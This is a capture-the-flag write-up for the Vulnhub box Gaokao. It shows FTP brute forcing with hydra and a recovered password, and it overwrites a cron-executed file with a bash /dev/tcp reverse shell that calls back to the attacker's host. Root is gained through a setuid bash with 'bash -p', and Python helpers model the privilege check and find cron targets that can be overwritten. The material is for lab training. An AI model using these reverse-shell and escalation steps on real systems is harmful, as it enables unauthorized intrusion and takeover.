
Vulnhub-Gaokao

Vulnhub-Gaokao machine writeup

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.139
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-09 18:21 CST
Nmap scan report for 192.168.179.139 (192.168.179.139)
Host is up (0.0021s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
| 256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_ 256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wellcome to Funbox: Gaokao !
3306/tcp open mysql MySQL 5.7.34-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.34-0ubuntu0.18.04.1
| Thread ID: 3
| Capabilities flags: 65535
| Some Capabilities: LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SwitchToSSLAfterHandshake, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsLoadDataLocal, Speaks41ProtocolNew, LongColumnFlag, Support41Auth, InteractiveClient, IgnoreSigpipes, SupportsTransactions, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: k%\x0E5s72S\x1B!+\x1F26p\x1C\x02I0T
|_ Auth Plugin Name: mysql_native_password
MAC Address: 32:5F:D8:FC:12:14 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.11 ms 192.168.179.139 (192.168.179.139)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.03 seconds

Information gathering

The web side is just the default Ubuntu Apache page, so HTTP is open but nothing is hosted there.
FTP allows anonymous login; download welcome.msg.

┌──(root㉿kakeru)-[~/tmp]
└─# ftp anonymous@192.168.179.139
Connected to 192.168.179.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.179.139]
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.179.83 !
230-
230-The local time is: Sun Feb 09 10:23:22 2025
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||8782|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg
226 Transfer complete
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||51553|)
150 Opening BINARY mode data connection for welcome.msg (169 bytes)
100% |********************************************************************| 169 31.01 KiB/s 00:00 ETA
226 Transfer complete
169 bytes received in 00:00 (14.47 KiB/s)
┌──(root㉿kakeru)-[~/tmp]
└─# cat welcome.msg
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <sky@%L>.

The banner contains two things that look like usernames. The %U, %R, %L and %T in welcome.msg are ProFTPD display variables (the login name, remote host, local host and time) that the server expands when it sends the banner, which is why the live banner read sky@funbox9. The real hints are the user sky and the hostname funbox9; try them against FTP.

┌──(root㉿kakeru)-[~/tmp]
└─# ftp %U@%R@192.168.179.139
ftp: Can't lookup `%R@192.168.179.139:ftp': Name or service not known
┌──(root㉿kakeru)-[~/tmp]
└─# ftp user@192.168.179.139
Connected to 192.168.179.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.179.139]
331 Password required for user
┌──(root㉿kakeru)-[~/tmp]
└─# ftp sky@%L@192.168.179.139
ftp: Can't lookup `%L@192.168.179.139:ftp': Name or service not known
┌──(root㉿kakeru)-[~/tmp]
└─# ftp sky@192.168.179.139
Connected to 192.168.179.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.179.139]
331 Password required for sky
Password:

After trying, it looks like user and sky may exist (ProFTPD replies "331 Password required for <name>" for any name, so this response alone proves nothing; the banner's sky@funbox9 is the stronger hint). Brute-force sky's password with hydra.

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp://192.168.179.139
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-09 18:40:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.179.139:21/
[STATUS] 295.00 tries/min, 295 tries in 00:01h, 14344106 to do in 810:25h, 14 active
[21][ftp] host: 192.168.179.139 login: sky password: thebest
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-09 18:43:31

That gives sky's password: thebest.

drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x 5 root root 4096 Jun 5 2021 ..
-rw------- 1 sky sky 56 Jun 5 2021 .bash_history
-r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout
-r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc
-r--r--r-- 1 sky sky 807 Jun 5 2021 .profile
drwxr----- 2 root root 4096 Jun 5 2021 .ssh
-rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag
-rw------- 1 sky sky 1489 Jun 5 2021 .viminfo
226 Transfer complete
ftp> cat user.flag
?Invalid command.
ftp> get user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||8837|)
150 Opening BINARY mode data connection for user.flag (66 bytes)
100% |********************************************************************| 66 1.67 KiB/s 00:00 ETA
226 Transfer complete

There is a user.flag whose group is sarah (mode -rwxr-x---, owner sky): sarah can read and execute it but not write to it, while sky can. Let's look at the flag.

┌──(root㉿kakeru)-[~/tmp]
└─# cat user.flag
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"

The flag is not base64, but user.flag is not a simple text file either: it is a shell script,
so something on the box must be running it. The only sh scripts I have written myself are reverse shells, so upload a reverse-shell script through FTP.

┌──(root㉿kakeru)-[~/tmp]
└─# cat reverse.sh
bash -i >& /dev/tcp/192.168.179.83/1234 0>&1
ftp> put reverse.sh
local: reverse.sh remote: reverse.sh
229 Entering Extended Passive Mode (|||58762|)
150 Opening BINARY mode data connection for reverse.sh
100% |********************************************************************| 45 255.49 KiB/s 00:00 ETA
226 Transfer complete
45 bytes sent in 00:00 (6.58 KiB/s)
ftp> mv reverse.sh user.flag
?Invalid command.

The ftp client has no mv (its built-in command is rename), so rename the file locally instead and upload it as user.flag.

┌──(root㉿kakeru)-[~/tmp]
└─# cat user.flag
#!/bin/sh
bash -i >& /dev/tcp/192.168.179.83/1234 0>&1

ftp> put user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||34801|)
150 Opening BINARY mode data connection for user.flag
100% |********************************************************************| 55 383.64 KiB/s 00:00 ETA
226 Transfer complete
55 bytes sent in 00:00 (5.41 KiB/s)
ftp> ls -al
229 Entering Extended Passive Mode (|||62805|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 sky sky 4096 Feb 9 11:04 .
drwxr-xr-x 5 root root 4096 Jun 5 2021 ..
-rw------- 1 sky sky 56 Jun 5 2021 .bash_history
-r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout
-r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc
-r--r--r-- 1 sky sky 807 Jun 5 2021 .profile
-rw-r--r-- 1 sky sky 45 Feb 9 11:04 reverse.sh
drwxr----- 2 root root 4096 Jun 5 2021 .ssh
-rwxr-x--- 1 sky sarah 55 Feb 9 11:06 user.flag
-rw------- 1 sky sky 1489 Jun 5 2021 .viminfo
226 Transfer complete

Upload succeeded. Because put overwrote the existing file in place, user.flag kept its owner, group and mode (-rwxr-x--- sky sarah); only the size and timestamp changed. Listen locally and the shell comes back.

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$

Privilege escalation

I was stuck here for a long time.
First I checked sudo, but sudo prompts for a password.
Then I listed SUID binaries; they all looked like stock /bin entries, I looked up a few at random on GTFOBins and moved on.
My plan was to start with pspy64 and watch for scheduled tasks.
That showed user.flag is run by a scheduled job.

2025/02/09 12:04:19 CMD: UID=0     PID=2      | 
2025/02/09 12:04:19 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2025/02/09 12:05:01 CMD: UID=0 PID=27586 | bash -i /home/sky/user.flag
2025/02/09 12:05:01 CMD: UID=1002 PID=27585 | /bin/sh -c bash -i /home/sky/user.flag > /dev/null
2025/02/09 12:05:01 CMD: UID=0 PID=27584 | /usr/sbin/CRON -f

I saw a UID=0 entry in that chain running bash -i /home/sky/user.flag. Does that mean root also runs this job? The line below it is sarah running the same task, and the shell I got back was sarah's. I ran nc -lp 1234 in Kali several more times, and every time it came back as sarah.
Later the group admin hinted that this bash's PS1 was telling me something.
In Linux, PS1 (Prompt String 1) is the variable that defines the shell prompt. A normal user's prompt usually ends in $, root's in #.
The prompt on this box is bash-4.4$, with no user name or path. That is not a restricted shell; it is bash's built-in default PS1 (\s-\v\$ ), which appears whenever no profile or .bashrc sets one, and \$ renders as $ because the effective UID is not 0. The real clue is that /bin/bash on this machine is setuid root (it is in the SUID list below), and bash drops the effective UID back to the real one at startup unless it is started with -p. So bash -p gives a root shell.

^X-su-4.4$ find / -user root -perm -4000 -print 2>/dev/null
/bin/bash
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-su-4.4$ /bin/bash
bash-4.4$ bash -p
bash-4.4# id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)

So the setuid /bin/bash was exploitable all along, and I had simply skipped past it.

-p (privileged mode):
By default, when bash starts with an effective user ID (or group ID) different from the real one, as happens when it is executed as a setuid/setgid program, it sets the effective IDs back to the real ones and so drops the privilege.
With bash -p the effective IDs are kept; in this mode bash also skips $ENV and $BASH_ENV, does not import shell functions from the environment, and ignores SHELLOPTS, BASHOPTS, CDPATH and GLOBIGNORE if they appear in the environment.
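The rule above, written out as an added Python model (this is not bash's source and not code from the original writeup): exec_suid computes the credentials a setuid/setgid binary starts with from its ls -l mode string, bash_startup applies bash's privilege check with and without -p, and parse_id reads id output so the prediction can be compared with what the shell actually reports. The -rwsr-sr-x root root /bin/bash entry and the id line are taken from the output on this page; the "4.4" version string in the prompt is an assumption.

```python
"""Why a setuid-root /bin/bash gives `bash-4.4$` but `bash -p` gives `bash-4.4#`.

Added example modelling bash's startup rule; not bash source or code from the writeup.
"""
import re
from dataclasses import dataclass

# `id` prints euid/egid only when they differ from the real ids.
ID_FIELD_RE = re.compile(r"\b(uid|gid|euid|egid)=(\d+)")


@dataclass(frozen=True)
class Creds:
    uid: int
    euid: int
    gid: int
    egid: int


def parse_id(line):
    """Parse an `id` line into Creds, defaulting euid/egid to the real ids."""
    f = {k: int(v) for k, v in ID_FIELD_RE.findall(line)}
    return Creds(f["uid"], f.get("euid", f["uid"]), f["gid"], f.get("egid", f["gid"]))


def exec_suid(mode, owner_uid, owner_gid, caller):
    """Credentials right after exec of a file with the given `ls -l` mode string.

    mode[3] is the owner execute slot ('s'/'S' = setuid), mode[6] the group
    slot ('s'/'S' = setgid). Real ids never change on exec.
    """
    euid = owner_uid if mode[3] in "sS" else caller.euid
    egid = owner_gid if mode[6] in "sS" else caller.egid
    return Creds(caller.uid, euid, caller.gid, egid)


def bash_startup(creds, privileged=False):
    """bash's rule: started with euid != uid or egid != gid and without -p,
    it calls setuid(getuid())/setgid(getgid()) and drops the privilege.
    With -p (privileged mode) the effective ids are kept."""
    running_setuid = creds.euid != creds.uid or creds.egid != creds.gid
    if running_setuid and not privileged:
        return Creds(creds.uid, creds.uid, creds.gid, creds.gid)
    return creds


def default_prompt(creds, version="4.4"):
    """bash's built-in PS1 is '\\s-\\v\\$ ': '\\$' is '#' only when euid == 0.
    The version string is an assumption for display only."""
    return f"bash-{version}{'#' if creds.euid == 0 else '$'} "


if __name__ == "__main__":
    sarah = Creds(1002, 1002, 1002, 1002)           # real ids seen in the reverse shell
    start = exec_suid("-rwsr-sr-x", 0, 0, sarah)    # /bin/bash, root:root, from the SUID list
    for flag in (False, True):
        after = bash_startup(start, privileged=flag)
        print(f"bash{' -p' if flag else ''}: {after} prompt={default_prompt(after)!r}")
    # The id output captured after `bash -p` should agree with the model.
    print(parse_id("uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)"))
```

Running it prints sarah's real ids with euid/egid reset to 1002 for plain bash and euid/egid 0 for bash -p, matching the two prompts and the id line captured above.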

Why did the scheduled task show a line running as root? The cron daemon (/usr/sbin/CRON -f, UID 0) is the process that wakes up every minute; for each job it forks, switches to the crontab owner and runs /bin/sh -c <command>. That is the UID=1002 line: sarah's sh running bash -i /home/sky/user.flag > /dev/null, so the job is sarah's. The UID=0 on PID 27586 is most likely an artifact of /bin/bash being setuid root: the kernel marks a process that has exec'd a setuid binary non-dumpable and exposes its /proc entry as root-owned, which is what pspy picks up; it is not a second, root-owned copy of the job. The Apache analogy holds: root starts the service, but the workers, and any shell you get from them, are www-data. Note also that cron invokes the file as bash -i /home/sky/user.flag, so its #!/bin/sh shebang is never consulted and the bash-only >& and /dev/tcp redirections in the payload work.
So user.flag is executed by sarah.
Now that we are root we can check the crontab directly.

bash-4.4# pwd       
/var/spool/cron/crontabs
bash-4.4# ls
sarah
bash-4.4# cat sarah
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.A5TLWA/crontab installed on Sun Jun 6 13:52:29 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/1 * * * * bash -i /home/sky/user.flag > /dev/null

So this job runs only as sarah; it lives in /var/spool/cron/crontabs/sarah, which is why it never ran as root.
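As an added example (not part of the original writeup or of pspy), here is a small Python triage script for pspy output that applies the reasoning from the pspy and crontab sections above: the owner of a cron job is the UID of the /bin/sh -c wrapper that CRON forks, not the UID of CRON itself or of the final command, and the interesting jobs are those whose script lives somewhere we can write. The sample lines are the pspy64 lines captured above; the writable-directory list (/home/sky, writable through sky's FTP login) is an assumption supplied by the caller.

```python
"""Triage pspy output for cron jobs that execute a file we can overwrite.

Added example for this writeup; not part of pspy or of the original post.
"""
import re

# Constructed sample: the pspy64 lines captured on the Gaokao box above.
PSPY_SAMPLE = """\
2025/02/09 12:04:19 CMD: UID=0     PID=2      |
2025/02/09 12:04:19 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity
2025/02/09 12:05:01 CMD: UID=0     PID=27586  | bash -i /home/sky/user.flag
2025/02/09 12:05:01 CMD: UID=1002  PID=27585  | /bin/sh -c bash -i /home/sky/user.flag > /dev/null
2025/02/09 12:05:01 CMD: UID=0     PID=27584  | /usr/sbin/CRON -f
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s*\|\s*(?P<cmd>.*)$"
)
PATH_RE = re.compile(r"/[\w./-]+")   # absolute paths inside a command line
SH_WRAPPER = "/bin/sh -c "           # cron runs every job as: /bin/sh -c <command>


def parse_pspy(text):
    """Turn pspy CMD lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if m:
            events.append({"ts": m["ts"], "uid": int(m["uid"]),
                           "pid": int(m["pid"]), "cmd": m["cmd"].strip()})
    return events


def cron_jobs(events):
    """Recover cron jobs from the chain CRON -> /bin/sh -c <cmd> -> <cmd>.

    The job owner is the UID of the /bin/sh wrapper: crond (UID 0) forks and
    switches to the crontab owner before exec'ing /bin/sh -c.  The UID pspy
    shows for the final command can mislead when it execs a setuid binary
    (the setuid-root /bin/bash on this box), so it is deliberately not used.
    Jobs are matched to CRON wake-ups by timestamp (second resolution).
    """
    cron_ticks = {e["ts"] for e in events if e["cmd"].startswith("/usr/sbin/CRON")}
    jobs = []
    for e in events:
        if e["ts"] in cron_ticks and e["cmd"].startswith(SH_WRAPPER):
            command = e["cmd"][len(SH_WRAPPER):]
            tokens = command.split()
            jobs.append({
                "uid": e["uid"],
                "command": command,
                # cron names this interpreter explicitly, so the target file's
                # shebang is ignored; bash-only syntax works when this is bash.
                "interpreter": tokens[0] if tokens else "",
                "paths": PATH_RE.findall(command),
            })
    return jobs


def controlled_targets(jobs, writable_dirs):
    """(owner_uid, path) pairs for job paths under a directory we can write to."""
    hits = []
    for job in jobs:
        for path in job["paths"]:
            if any(path.startswith(d.rstrip("/") + "/") for d in writable_dirs):
                hits.append((job["uid"], path))
    return hits


if __name__ == "__main__":
    found = cron_jobs(parse_pspy(PSPY_SAMPLE))
    for job in found:
        print(f"uid={job['uid']} via {job['interpreter']}: {job['command']}")
    # Assumption: /home/sky is writable because we hold sky's FTP password and
    # the FTP root is sky's home directory, as the listing above shows.
    for uid, path in controlled_targets(found, ["/home/sky"]):
        print(f"overwrite {path} -> code execution as uid {uid}")
```

On the sample above it reports one job, owned by uid 1002 and run through bash, and flags /home/sky/user.flag as the overwrite target; /dev/null is referenced by the same command but is not under a writable directory, so it is ignored.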
Finally, I also learned something from the group admin ll104567 that I had never heard of: linpeas.sh.

linPEAS is a privilege-escalation enumeration script for Linux, used during post-exploitation to enumerate the system and find escalation paths. System enumeration: it collects a wide range of information, including users, groups, processes, network configuration and installed software. Privilege-escalation checks: it looks for common misconfigurations and vulnerabilities that could let an attacker raise their privileges.

Running it also flags bash as an escalation vector:

6(CVE-2011-1485)
-rwsr-sr-x 1 root root 1.1M Jun 6 2019 /bin/bash
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils

In the output /bin/bash is printed red on a yellow background, the colour linPEAS's legend uses for findings it rates as a 95% likely privilege-escalation vector.